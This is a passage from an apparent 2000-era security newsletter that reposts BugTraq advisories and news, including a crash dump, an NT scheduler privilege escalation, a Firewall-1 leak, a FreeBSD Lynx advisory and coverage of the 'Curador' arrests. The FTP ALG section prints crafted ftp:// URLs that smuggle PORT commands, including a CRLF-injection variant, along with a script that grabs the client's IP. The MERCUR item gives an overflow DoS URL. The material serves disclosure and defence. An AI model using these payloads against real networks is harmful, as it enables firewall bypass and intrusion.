ntdll!ZwReplyWaitReceivePort
00003a98 00000000 00000000 00000000 00000000 00000000 rpcrt4!NdrOleAllocate

State Dump for Thread Id 0xee

eax=77b20000 ebx=00000000 ecx=0008a2e8 edx=00000000 esi=0126ff7c
edi=0008a2ec
eip=77f6791f esp=0126ff68 ebp=0126ff84 iopl=0 nv up ei pl nz na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000202


function: NtDelayExecution
77f67914 b827000000 mov eax,0x27
77f67919 8d542404 lea edx,[esp+0x4]
ss:0249e96f=????????
77f6791d cd2e int 2e
77f6791f c20800 ret 0x8
77f67922 8bc0 mov eax,eax

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name
0126ff84 77f1cebe 0000ea60 00000000 77b489f4 0000ea60 ntdll!NtDelayExecution
0126ffec 00000000 77b4f66d 0008a2e8 00000000 00000000 kernel32!Sleep
00000000 00000000 00000000 00000000 00000000 00000000 iexplore!<nosymbols>

*----> Raw Stack Dump <----*
0126ff68 f5 ce f1 77 00 00 00 00 - 7c ff 26 01 e8 a2 08 00
...w....|.&.....
0126ff78 00 00 00 00 00 ba 3c dc - ff ff ff ff ec ff 26 01
......<.......&.
0126ff88 be ce f1 77 60 ea 00 00 - 00 00 00 00 f4 89 b4 77
...w`..........w
0126ff98 60 ea 00 00 e9 f5 b4 77 - 00 00 00 00 00 00 b2 77
`......w.......w
0126ffa8 e8 a2 08 00 e8 a2 08 00 - 87 f6 b4 77 18 00 14 02
...........w....
0126ffb8 40 d4 06 00 de 4e f0 77 - e8 a2 08 00 18 00 14 02
@....N.w........
0126ffc8 40 d4 06 00 e8 a2 08 00 - 40 d4 06 00 c4 ff 26 01
@.......@.....&.
0126ffd8 00 02 00 00 ff ff ff ff - 44 b9 f3 77 38 d2 f3 77
........D..w8..w
0126ffe8 00 00 00 00 00 00 00 00 - 00 00 00 00 6d f6 b4 77
............m..w
0126fff8 e8 a2 08 00 00 00 00 00 - 00 00 00 00 02 00 00 00
................
01270008 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270018 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270028 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270038 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270048 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270058 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270068 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270078 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270088 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270098 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................

State Dump for Thread Id 0xec

eax=00000010 ebx=00000000 ecx=012c2200 edx=00000000 esi=000000a4
edi=016fff78
eip=77f682db esp=016fff5c ebp=016fff80 iopl=0 ov up ei pl nz na po
cy
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000a07


function: NtWaitForSingleObject
77f682d0 b8c5000000 mov eax,0xc5
77f682d5 8d542404 lea edx,[esp+0x4]
ss:0292e963=????????
77f682d9 cd2e int 2e
77f682db c20c00 ret 0xc
77f682de 8bc0 mov eax,eax

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name
016fff80 77f04f37 000000a4 000927c0 00000000 700dcbbc
ntdll!NtWaitForSingleObject
77f67610 4affc033 89257508 ff900c42 037d044a 520004c2
kernel32!WaitForSingleObject

*----> Raw Stack Dump <----*
016fff5c a0 cc f1 77 a4 00 00 00 - 00 00 00 00 78 ff 6f 01
...w........x.o.
016fff6c 00 00 00 00 10 24 2c 01 - 40 75 f6 77 00 44 5f 9a
.....$,.@u.w.D_.
016fff7c fe ff ff ff 10 76 f6 77 - 37 4f f0 77 a4 00 00 00
.....v.w7O.w....
016fff8c c0 27 09 00 00 00 00 00 - bc cb 0d 70 a4 00 00 00
.'.........p....
016fff9c c0 27 09 00 d4 2c f9 77 - 10 24 2c 01 ec ff 6f 01
.'...,.w.$,...o.
016fffac 10 24 2c 01 ed ca 0d 70 - 50 d3 f9 77 c7 ca 0d 70
.$,....pP..w...p
016fffbc de 4e f0 77 10 24 2c 01 - d4 2c f9 77 50 d3 f9 77
.N.w.$,..,.wP..w
016fffcc 10 24 2c 01 50 d3 f9 77 - c4 ff 6f 01 54 1a 06 00
.$,.P..w..o.T...
016fffdc ff ff ff ff 44 b9 f3 77 - 38 d2 f3 77 00 00 00 00
....D..w8..w....
016fffec 00 00 00 00 00 00 00 00 - be ca 0d 70 10 24 2c 01
...........p.$,.
016ffffc 00 00 00 00 4d 5a 90 00 - 03 00 00 00 04 00 00 00
....MZ..........
0170000c ff ff 00 00 b8 00 00 00 - 00 00 00 00 40 00 00 00
............@...
0170001c 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
0170002c 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
0170003c c0 00 00 00 0e 1f ba 0e - 00 b4 09 cd 21 b8 01 4c
............!..L
0170004c cd 21 54 68 69 73 20 70 - 72 6f 67 72 61 6d 20 63 .!This program
c
0170005c 61 6e 6e 6f 74 20 62 65 - 20 72 75 6e 20 69 6e 20 annot be run in
0170006c 44 4f 53 20 6d 6f 64 65 - 2e 0d 0d 0a 24 00 00 00 DOS
mode....$...
0170007c 00 00 00 00 63 c9 86 b7 - 27 a8 e8 e4 27 a8 e8 e4
....c...'...'...
0170008c 27 a8 e8 e4 27 a8 e9 e4 - cb a8 e8 e4 7e 8b fb e4
'...'.......~...

--[END]---------------------------------------------------------------------
---

Cheers,
|-+-||-+-|-+-|-+-|oOo-(NtWaK0)(Telco. Eng. Etc..)-oOo|-+-|-+-|-+-||-+-|
The only secure computer is one that's unplugged, locked in a
safe, and buried 20 feet under the ground in a secret location...
and i'm not even too sure about that one"
--Dennis Huges, FBI.
|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-||-+-||-+-|
Live Well Do Good --:)

Cheers,
------|oOo-(NtWaK0)(Telco. Eng. InfoSec Senior, Etc..)-oOo|------
The only secure computer is one that's unplugged, locked in a
safe, and buried 20 feet under the ground in a secret location...
and i'm not even too sure about that one"--Dennis Huges, FBI.
-----------------------------------------------------------------
Live Well Do Good --:)


@HWA

104.0 HNS:Drive Mappings in Interactive Login
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 15, 2000
Issue: Drive Mappings in Interactive Login affect Processes running
in context of Schedule User. Points indicating this is a bug/security
exploit and not by design (as somehave indicated to the author) ...

Drive Mappings in Interactive Login
Posted to BugTraq on March 15, 2000

Issue: Drive Mappings in Interactive Login affect Processes running
in context of Schedule User.

Points indicating this is a bug/security exploit and not by design (as
somehave indicated to me)

1. Drive mappings are individual to each user, as seen by their
location in the registry under HKCU\Network. This point alone
indicates a bug. Why should the *personal* drive mappings of an
interactive login session have *any* affect on a service running in a
different user context, in a supposedly secure environment? They
shouldn't, plain and simple.

2. KB Article Q130668 is the only article I could find which has any
relationship to this issue, but it deals with a "
bug" when the drives
are mapped to Netware Volumes using GSNW. However, reading
between the lines, one can see that the behavior described (which is
identical in both Netware and NT drive mappings) is not by design,
otherwise, why would they state this: Microsoft has confirmed this
to be a problem in Windows NT Workstation and Server versions
3.5, 3.51, and 4.0... They do offer up a solution to one half of the
problem - that is when the scheduled process leaves a mapped
drive, which then affects any interactive processes by preventing the
use of this drive (unless appropriate permissions exist for the
interactive user). But they make no mention of the other half - that a
non- privileged user can affect the environment of the scheduled
process, which is often in a priviliged account context.

Take the following scenario:

A "
secure" NT workstation is configured with scheduler running in a
user context that has specific elevated rights in order to perform
unattended administrative functions based on scripts that are stored
on a server. But one of the tasks performed in these scripts requires
a mapped drive letter; UNC paths won't work. So to be sure, the
scripts begins by mapping a drive letter to the shared network
resource containing the patches and updates placed there when
required. Often these patches are security fixes and the like, and
the scheduler dutifully applies them to some large number of
machines as directed in the script.

Here comes the exploit. If an interactive login is present, and the
same drive letter is already mapped by a user, the net use in the
scheduled script will fail, as will the required hotfix or update. Not a
pretty picture in a large LAN whose security and stability may rely
on timely installation of these updates. This is the simplest
"
exploit".

Next we extend this a bit further: the user maps a drive letter in an
interactive login, and places in it a script with the same filename as
that called by the scheduled update, and makes sure the schedule
user has permissions to this file and network resource. All of this
could be performed by a non- privileged user. The schedule service
will now execute this script in the elevated user context, and the
script could be instructed to install a trojan, add the user to the local
Admin group, or whatever. The bottom line is that this design flaw
can be easily exploited to allow any user with interactive login rights
to a workstation to elevate himself to the rights of the schedule user,
which is often Administrator of the workstation.

I have tested this on NT4 SP5 and 6a. (Note this is without IE5
installed, just the built in AT scheduler). I have also tested this with
all combinations of Local and Domain accounts for both the
scheduler and the interactive user. I have tested it with and without
persistent drive mappings present for either user - in each case,
whoever gets the login first gets the drive letter.


@HWA


105.0 HNS:DoS Attack in MERCUR WebView
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 15, 2000
UssrLabs found a buffer overflow in MERCUR WebView
WebMail-Client 1.0where they do not use proper bounds checking in
the code who handle the GETcommands The following all result in a
Denial of Service against the service in question. ...

DoS Attack in MERCUR WebView
Posted to BugTraq on March 15, 2000

USSR Advisory Code: USSR-2000036

Release Date:
March 16, 2000

Systems Affected:
MERCUR WebMail-Client Version 1.0 port (1080)

THE PROBLEM

UssrLabs found a buffer overflow in MERCUR WebView
WebMail-Client 1.0where they do not use proper bounds checking in
the code who handle the GETcommands The following all result in a
Denial of Service against the servicein question.

Example:
http://hostip:1080/mmain.html&mail_user=(buffer)

Where [buffer] is aprox. 1000 characters. (0)

Binary or source for this Exploit:

http://www.ussrback.com/

Exploit:
the Exploit, crash the remote machine service WebMail

Vendor Status:
informed

Vendor Url:
http://www.atrium-software.com
Program Url:
http://www.atrium-software.com/mercur/webview_e.html

Credit: USSRLABS

SOLUTION
Noting yet.


@HWA


106.0 HNS:Problem with Firewall-1
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 15, 2000
The Dartmouth Collage security group has uncovered a problem
withFirewall-1 which could lead to the protected site handing out
more IPaddress info than intended. ..

Problem with Firewall-1
Posted to BugTraq on March 15, 2000

The Dartmouth Collage security group has uncovered a problem
withFirewall-1 which could lead to the protected site handing out
more IPaddress info than intended.

Under certain nominal load conditions (CPU less than 40%, 200+
activesessions) Firewall-1 will begin "
leaking" packets with their
privateaddress information in tact. The result is that the receiving
site willreceive a SYN=1 that it will be unable to respond to. Once
the clientattempts a resend, the target network (or anyone in the
middle) can usethe source port information to enumerate the client's
true IP address.

Here is a Snort trace which has been sanitized and formatted for
easierviewing:

Mar 9 14:01:19 172.30.1.10:1721 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:01:48 200.200.200.5:1721 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:04:35 172.30.1.10:1858 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:05:05 200.200.200.5:1858 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:23:25 172.16.5.20:4868 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:23:51 200.200.200.5:4868 -> 192.168.1.5:80 SYN **S*****

So the first packet goes out with the private address information
stillin place and SYN=1. When the client does not receive a reply,
itretransmits the SYN=1. Since FW-1 considers this to be part of
the samesession, the same source port number is assigned. If the
second packetgets translated properly (as in these traces) the
source port info canpotentially be used to map the legal IP address
to the private address.

Of course the problem here is that a would be bad guy now knows
theclient's true IP address. If enough hosts are recorded, its
possiblethat most of the internal network address space could be
enumerated.

This problem has been noted on Firewall-1 versions 3.0b & 4.0. 4.1
hasnot been checked but its expected that the same problem may
exist. Wewhere able to reproduce the problem on a Nokia IP440 and
NT. I've seenthis problem on Solaris 2.6 as well, but do not have the
data to back upthe statement.

A quick fix is to apply egress filtering to the border router and
blockall private addressing that attempts to leak though. A how-to
on egresscan be found at:
http://www.sans.org/y2k/egress.htm

Cheers all,
Chris


@HWA.


107.0 HNS:Freeze Distribution of IE 5.0, 5.0a, and 5.0b
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 15, 2000
Microsoft has just discovered a serious problem when a user
attempts toinstall the 128-bit security patch for Internet Explorer 5.0,
5.0a and5.0b on Windows 2000 as part of an IE5.0 IEAK package.
After restartingthe system, users will not be able to logon to
Windows 2000 ...

Freeze Distribution of IE 5.0, 5.0a, and 5.0b
Posted to BugTraq on March 15, 2000

Microsoft has just discovered a serious problem when a user
attempts toinstall the 128-bit security patch for Internet Explorer 5.0,
5.0a and5.0b on Windows 2000 as part of an IE5.0 IEAK package.
After restartingthe system, users will not be able to logon to
Windows 2000.

The instructions to incorporate the 128-bit security patch into
IEAKpackages say you should use the command line switches:
"
/q:a /r:n /n:v"
The /n:v switch when used with ie5dom.exe (the 128-bit security
patch for5.0x) causes important security files on Windows 2000 to
be replaced witholder files, preventing users from logging on.
Installations created using IEAK 5.0 for Windows 95, Windows 98,
andWindows NT4 systems with the ie5dom.exe, and these
command line parametersspecified, are not affected.

It is critical that you freeze distribution of IE 5.0, 5.0a or 5.0b
buildsthat incorporate the 128-bit security patch with these
switches. Pleasetake immediate action to help prevent more
customers from encounteringthis issue.

Please checkhttp://www.microsoft.com/windows/ieak/en/support
/faq/default.asp andMicrosoft Knowledge Base (KB) article Q255669
for updates to this issue.
Note: It may take 24 hours from the original issuance of this bulletin
forthe Microsoft Knowledge Base (KB) article related to this issue to
bevisible.

We sincerely apologize for this inconvenience and thank you in
advance foryour help in protecting end users.

Thank you, The IEAK Product Team

Checking to see if you have included this command-line switch:

To check a package for this issue:

Open your IEAK package in the IEAK Wizard and go to the Custom
Componentsscreen. Examine each custom component. If you have
included ie5dom.exe asa custom component, check the command
line switches for '/R:N /Q:A /N:V'

*OR*

If you don't have the IEAK Wizard available to you:

1) Extract your custom IE 5.0x package by running this command
line:'ie5setup.exe /c /t:'

2) Browse to the directory. Open 'iesetup.cif' in Notepad.

3) Look for a section like this:

[CUSTOM0]
SectionType=Component
DisplayName='128-bit Security'
URL1='Ie5dom.exe',2
GUID=128PATCH
Command1='Ie5dom.exe'
Switches1='/R:N /Q:A /N:V'
Type1=2
UninstallKey=''
Version=
Size=216
Platform=win95,win98,nt4,nt5,
Modes='0,1,2'
Details='128-bit Securiy'
Group=CustItems
Priority=500
UIVisible=0

4) Examine for:

Switches1='/R:N /Q:A /N:V'

If you have this switch listed, immediately freeze distribution of
thispackage!!!


@HWA


108.0 HNS:Extending the FTP "
ALG" vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 15, 2000
It is possible to cause many firewalls to open arbitrary ports allowing
external hosts to connect to "
protected" clients. In this case, it is
done by fooling the protected client into sending a specially crafted
FTP request through the firewall, which it misinterprets as a
legitimate FTP "
PORT" command ...


Extending the FTP "
ALG" vulnerability
Posted to BugTraq on March 15, 2000

Author: Mikael Olsson, EnterNet Sweden
mikael.olsson@enternet.se
Original Date: 2000-03-10
Originally posted to: Bugtraq, Vuln-dev (BID 1045)
Vendor contacted: Nope, sorry, too many.

Updated: 2000-03-14
- Added browser-specific info
- Begun writing a list of firewalls expected to be vulnerable
- Rewrote a couple of paragraphs that were causing much head
scratching


Synopsis

It is possible to cause many firewalls to open arbitrary ports allowing
external hosts to connect to "
protected" clients.

In this case, it is done by fooling the protected client into sending a
specially crafted FTP request through the firewall, which it
misinterprets as a legitimate FTP "
PORT" command.

Basic idea : how to open arbitrary ports against a client

* Send a HTML email to an HTML-enabled mail reader containing
the tag


You could also conceivably plant a web page somewhere on a
server containing this link. Please reference CERT advisory
CA-2000-02: Malicious HTML Tags Embedded in Client Web
Requests http://www.cert.org/advisories/CA-2000-02.html

* Balance the number of A so that the PORT command will begin on
a new packet boundary. This may also be done by having the server
use a low TCP MSS to decrease the number of A's that one has to
add.

* The firewall in question will incorrectly parse the resulting RETR
/aaaaaaaa[....]aaaaaPORT 1,2,3,4,0,139 as first a RETR command
and then a PORT command and open port 139 against your address
(1.2.3.4 in this case)

* Now the server ftp.rooted.com can connect to the client on port
139. Ouch.

Before you ask:
No, it does not have to be port 139. It can be any port. Some
firewalls disallow "
known server ports" for these connections; such
ports cannot be used, but I'm betting there are plenty other ports
that can be used in such cases.

Address translation playing games

You have to know the IP address of the client in order to fool the
firewall into opening the port.

If the client is not dynamically NATed, this is easy.

If the client IS dynamically NATed, this is a bit harder.

How to make it work through address translation

There are several ways to figure out what the private address is.
Here's two:

* Send an email to the address in question containing an img src
ftp://ftp.rooted.com:23456 and hope that the firewall won't realise
that port 23456 is FTP. PORT commands won't be translated this
way, so the private IP adress will be exposed. This assumes that
23456 is allowed through the firewall and that it won't attempt to
parse FTP command data on that port.

* Send an email with a link to a web page that contains javascript
that extracts the private IP address and posts it to the server.

The javascript code below works on Netscape; I don't know what the
equivalent is for MSIE.

vartool=java.awt.Toolkit.getDefaultToolkit();
addr=java.net.InetAddress.getLocalHost();
ip=addr.getHostAddress();

Once we know about the IP address, we can adjust the img src so
that it is valid for that specific internal client.

The dynamic translation will also likely change the port number
opened on the NAT:ed public address, but that's ok. All we have to
do is have our fake FTP server read the command packet containing
the PORT command, as changed by the firewall, and we'll know
what public address and port to connect to in order to get to our
desired port on the "
protected" client.

I think I've heard about reverse firewall penetration before

Yeah, the idea of internal users fooling a firewall to let them out isn't
new, but the scope of this vulnerability is "
new" IMHO.

Basically, you can get at anyone with a browser or HTML-enabled
mail reader protected by firewalls that have more than 50% market
coverage. That's bad.

What about Checkpoint's FTP PASV fix for FW-1?

Checkpoint's fix for FW-1 is to make sure that every packet in the
command stream ends with CRLF (0x0a 0x0d in hex). That would
help against the above attack, but not if we modify it a wee bit:

src="
ftp://ftp.rooted.com/aaaaaaa%0a%0dPORT 1,2,3,4,0,139"

Ouch. This WILL work in Netscape v4.7 (I've verified it using a
network sniffer, anyone care for a packet dump?).

The firewall will see this as two separate commands: RETR
aaaaaaaaaa PORT 1,2,3,4,0,139

which means that poorly implemented proxies are likely to be
vulnerable aswell.

This in and of itself is a browser bug IMHO. Line feeds are not valid
characters in a file name.

Added: 2000-03-14

Apparently, this CRLF variant will _not_ work in MSIE (version
unknown?). It's doing the right thing: stripping out the CRLF.
(Second hand info, I have not verified MSIE's behaviour)

No information on other browsers or mail readers.

Other fixes?

I havent seen other firewall vendors make public claims that they
protect against any of these attacks. Cisco is apparently working on
a fix for PIX, but it's taking time, so I'm guessing they're doing it the
right way - since doing it the right way really does take quite a bit of
time.

It would seem like all the others are silently going to sneak fixes into
their upcoming updates and pretend like they never were vulnerable
in the first place. Grumble.

Added: 2000-03-14

I suspect that FW-1's security servers may disable this attack.
(Dunno, I'm not an FW-1 user)


What firewalls are likely to be vulnerable?

This specific attack is likely to work against most "
stateful
inspection" firewalls with poorly implemented application layer filters.
This probably includes most products out there.

It may also affect poorly implemented "
proxies" when the CRLF is
added before the PORT command as described above.

Added: 2000-03-14

Checkpoint FW-1 v3 is likely to allow connections on most ports
1024-65535 with full bidirectional communication

Checkpoint FW-1 v4 is likely to allow connection on most ports
1024-65535 with only unidirectional communication

Cisco PIX is likely to allow connections to any port with full
bidirectional communication

Linux's ip_masq_ftp module is _really_ easy to fool, according to
Solar Designer. It will accept a "
PORT" command anywhere in a
packet. This means that even this is likely to work:
"
http://rooted.com:21/PORT 1,2,3,4,0,139"

This is likely NOT a complete list. And no, I'm not going to get in
touch with vendors and report the vulnerability. There are just too
many that are likely to be affected.


"
The great picture"

Other protocols than FTP are likely to be affected by this type of
vulnerability - pretty much any protocol that opens up ephereal ports
after the initial command session. A couple that come to mind are:

* Oracle SQL*Net (versions using separate data channels)
* RealAudio/Video (secondary UDP channel)
* H.323 (NetMeeting et al)
THIS IS NOT A COMPLETE LIST. Those were just a couple of
common ones off the top of my head.


Workarounds to this specific vulnerability

* Disable active FTP. Errrr, wait. The fix for the server side
vulnerability was to disable passive FTP. Let's rephrase that:

* Disable FTP altogether. Block port 21. Disable FTP Application
Layer Filters on all ports in your firewall.

* If you can't change the settings in your firewall, set the "
FTP
Proxy" setting in your browser/HTML-enabled mail reader to some
address that doesn't exist, like 127.0.0.2. After this change, your
browser won't be able to connect anywhere using FTP.
(From Solar Designer: This does not help if you're using
ip_masq_ftp, since it'll be fooled by HTTP looking like FTP.)

@HWA

109.0 FreeBSD-SA-00:08: Lynx overflows
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Submitted by FProphet

Source: Bugtraq

Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Date: Wed, 15 Mar 2000 09:34:43 -0800
Reply-To: security-officer@freebsd.org
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
Comments: RFC822 error: <W> FROM field duplicated. Last occurrence was
retained.
From: FreeBSD Security Officer <security-officer@freebsd.org>
Subject: FreeBSD Security Advisory: FreeBSD-SA-00:08.lynx
To: BUGTRAQ@SECURITYFOCUS.COM

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-00:08 Security Advisory
FreeBSD, Inc.

Topic: Lynx ports contain numerous buffer overflows

Category: ports
Module: lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current
Announced: 2000-03-15
Affects: Ports collection before the correction date.
Corrected: See below.
FreeBSD only: NO

I. Background

Lynx is a popular text-mode WWW browser, available in several versions
including SSL support and Japanese language localization.

II. Problem Descriptio

  
n

The lynx software is written in a very insecure style and contains numerous
potential and several proven security vulnerabilities (publicized on the
BugTraq mailing list) exploitable by a malicious server.

The lynx ports are not installed by default, nor are they "part of FreeBSD"
as such: they are part of the FreeBSD ports collection, which contains over
3100 third-party applications in a ready-to-install format.

FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security audit
of the most security-critical ports.

III. Impact

A malicious server which is visited by a user with the lynx browser can
exploit the browser security holes in order to execute arbitrary code as
the local user.

If you have not chosen to install any of the
lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current ports/packages, then
your system is not vulnerable.

IV. Workaround

Remove the lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current ports, if you
you have installed them.

V. Solution

Unfortunately, there is no simple fix to the security problems with the
lynx code: it will require a full review by the lynx development team and
recoding of the affected sections with a more security-conscious attitude.

In the meantime, there are two other text-mode WWW browsers available in
FreeBSD ports: www/w3m (also available in www/w3m-ssl for an SSL-enabled
version, and japanese/w3m for Japanese-localization) and www/links.

Note that the FreeBSD Security Officer does not make any recommendation
about the security of these two browsers - in particular, they both appear
to contain potential security risks, and a full audit has not been
performed, but at present no proven security holes are known. User beware -
please watch for future security advisories which will publicize any such

vulnerabilities discovered in these ports.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBOM/JklUuHi5z0oilAQEbzQP+K5HbTRk40fmb+pKOcUDD/r4ofcrkWtXn
Ya7PT/ALXvUnohm/jqKofNk9cXK1EspbgHb9N1OJZEzcYUAy378WpQgWh4uxKQa7
+541CwFPPIbWfJQJCOaUODN2qwnXdqXMj6noCKRMN0c3tBRG6R2zEfVaM1vMNS1+
+vcp5WAqDu4=
=dtMU
-----END PGP SIGNATURE-----


@HWA

110.0 Curador? BUSTED
~~~~~~~~~~~~~~~

Contributed by Abattis (Wired) and MerXor (MSNBC)
Follow-ups by Cruci. (MSNBC) more from HNN in section 119.0

-=-

Sources: Wired, MSNBC

http://www.wired.com/news/business/0,1367,35186,00.html

Alleged Hackers Arrested
Reuters

2:05 p.m. Mar. 24, 2000 PST


The FBI said Friday that two 18-year-olds had been arrested in Wales for
allegedly hacking into nine e-commerce websites around the world and
stealing credit card information.

The losses connected with the intrusions on websites in the United States,
Canada, Thailand, Japan, and Britain could exceed US$3 million, the FBI
said in a news release.


It said the theft of credit card information related to more than 26,000
accounts, the alleged scheme involved the disclosure of the data on the
Internet, and that the accused hackers used the screen name "Curador."

The two youths, who cannot be identified under British law, were arrested
Thursday by the Dyfed-Powys Police Service in Wales for violating
Britain's Computer Misuse Act, the FBI said.

The arrests stemmed from an FBI investigation conducted with the Welsh
police, the Royal Canadian Mounted Police, and Internet security
consultants, the FBI said, adding that the international banking and
credit card industry also provided substantial cooperation.

The FBI still is investigating last month's wave of cyber attacks that
disrupted some of the Internet's most popular sites. The FBI has yet to
make any arrests or bring any charges involving those attacks.

The FBI's own website was attacked March 14, the same day the agency
celebrated the 50th anniversary of its "Ten Most Wanted Fugitives" list,
which is publicized on the site,
FBI officials said.


-=-

MSNBC;

http://www.msnbc.com/news/386402.asp

Consultant was key to ‘Curador’ bust
The FBI crowed, but security specialist led police to Wales
By Mike Brunker
MSNBC

March 27 — While the FBI was quick to take credit
for the arrest last week of two teen-agers who
allegedly stole information on 26,000 credit cards
from Internet retailers, a Canadian computer
security consultant working with British
authorities tracked the suspects back to their small
village in Wales before the U.S. agency even got
involved, MSNBC.com has learned.

A PRESS RELEASE issued Friday by the FBI said the
arrests of the two 18-year-olds .came as a direct result of an
FBI investigation..
It added that unidentified Internet security consultants
had assisted in the case, but nowhere did it mention Chris
Davis of HeXedit Network Security Inc. of Ottawa, Ontario,
who worked for nearly two months assembling the evidence
that led authorities to the suspects.
In interviews with numerous news organizations,
including MSNBC.com, after the announcement, the FBI’s
Michael Vatis said the arrests should serve as a warning to
others who would use the Internet to steal.
.It’s important to say that anyone who underestimates
the skill of our agents ... does so at their own peril,. he said.

FBI PLAYED LIMITED ROLE
But interviews with Davis and other participants in the
case show that the FBI’s role in the investigation of
.Curador. was limited.
.They (the FBI) did get involved fairly late,. Davis said
Monday. .By the time they got involved, (British police) had
phone numbers, home addresses and all that..

Phone calls to the
National Infrastructure
Protection Center, which
Vatis heads, were not
returned Monday. A
spokesman for the FBI
declined to comment.
.In anything like this,
it really doesn’t serve any
purpose to go back and
try to heap credit one way
or the other,. said the
spokesman, Paul Bresson.
.I think the facts speak for
themselves..
But officials of Promobility.net, a wireless phone seller
in Ontario that was among the sites hit by .Curador,.
confirmed Davis’ account.
.That is 100 percent accurate,. spokesman Eric Geiler
said. .He could have knocked on [the suspects’] doors two
weeks before the FBI did..
Davis, who has been a computer security consultant for
nearly four years, said he got involved in the case in early
February after reading a boastful post from .Curador. —
the online alias that authorities say was jointly used by the
two 18-year-old suspects — on HackerNews.com about
the theft of credit card information from two e-merchants.
The credit card information was subsequently posted on a
Web site by .Curador,. who said he took the action to
publicize the lack of security at many e-commerce sites.

‘THAT’S PRETTY LOW’
.I read the boast and I thought, ‘That’s pretty low,’.
said Davis. .I checked and both sites seemed like fairly
small mom-and-pop type operations and I felt sorry for
them. So I fired off an e-mail and said and said, ‘I’ll help
you secure your site.’ They wrote back and said they had
no idea they’d even been hit (by hackers)..
Both Promobility.net and Ltamedia.com, a Knoxville,
Tenn., seller of .life-enhancing products,. agreed to turn
over their computer logs to Davis so he could determine
how the intruders had gained entry to their systems and
close the security holes.
Looking through the logs, Davis discovered that the
intrusions were accomplished using two known security
holes in Microsoft’s Internet Information Server, or IIS.
While Microsoft had issued .patches. to correct the holes
months earlier, none of the nine Web sites in the United
States, Canada, Thailand, Japan and the United Kingdom
that were hit by .Curador. had updated their software to
eliminate the problem.
(Microsoft is a partner in MSNBC.com.)
While he could have simply fixed the flaws and
returned to his paying jobs, Davis found himself growing
increasingly fascinated by the case and pressed on.
By analyzing e-mail sent through a free service that the
hackers wrongly thought would shield the IP address, Davis
was quickly able to determine that .Curador. was using an
Internet service provider in England. He then contacted
Scotland Yard, which referred him to police in South
Yorkshire, who determined from records obtained from the
ISP that the .crackers. the term for computer criminals
preferred by law-abiding hackers were in Wales.

SEARCH NARROWS TO TWO HOUSES
Soon, the British investigators tightened the circle to the
tiny fishing village of Clynderwen, population 500, and
ultimately to two houses in the village.
It was then, Davis said, that he heard from the FBI,
which learned from the Royal Canadian Mounted Police
that he was working on the case while investigating the
thefts from U.S. Web sites.

.They were able to
quickly obtain logs from
everybody who had been
affected in the U.S.
and I explained how
‘Curador’ had broken in,
showing them, ‘Here’s the
line from the log, here’s
how he exploited the security vulnerability.’.
The FBI, working with the RCMP and the Welsh
Dyfed-Powys Police Service, orchestrated the arrests on
Thursday of the 18-year-old suspects. The teenagers were
questioned for 12 hours after their arrest before being
released on bail as the investigation continues, Welsh police
said Monday.
In accordance with British law, neither of the suspects
was publicly identified. But one, Raphael Gray, has given
numerous interviews since his release to say that he had
acted only to highlight the lack of security on many retail
Web sites.
.I have done the honest thing, but I have been
ignored,. he was quoted as saying by the Sunday Telegraph
of London. .That’s why I posted the information on the
Internet..

CURADOR’S CLAIMS
Authorities have not identified the nine e-commerce
sites they say were burgled, but according to .Curador’s.
Web sites others include Feelgood Falls; Sales Gate;
Shopping Thailand; Vision Computers; NTD Media and the
American Society of Clinical Pathologists.
Gray has maintained in interviews since his arrest that
neither he nor his friend had used the stolen credit card data
for personal gain — an assertion backed up by a British
businessman who said he hired Gray to run his e-commerce
site.

.I’d have to give him money to buy lunch or get a
haircut,. the businessman told MSNBC.com on Monday.
The businessman, who contacted MSNBC.com,
agreed to talk about Gray on the condition that neither he
nor his Web site be identified because he feared it would be
bad for business.
His account could not be independently confirmed, but
his description of Gray was consistent with other published
accounts.
The businessman said Gray worked part-time for him
for two to three months and was in charge of the company’s
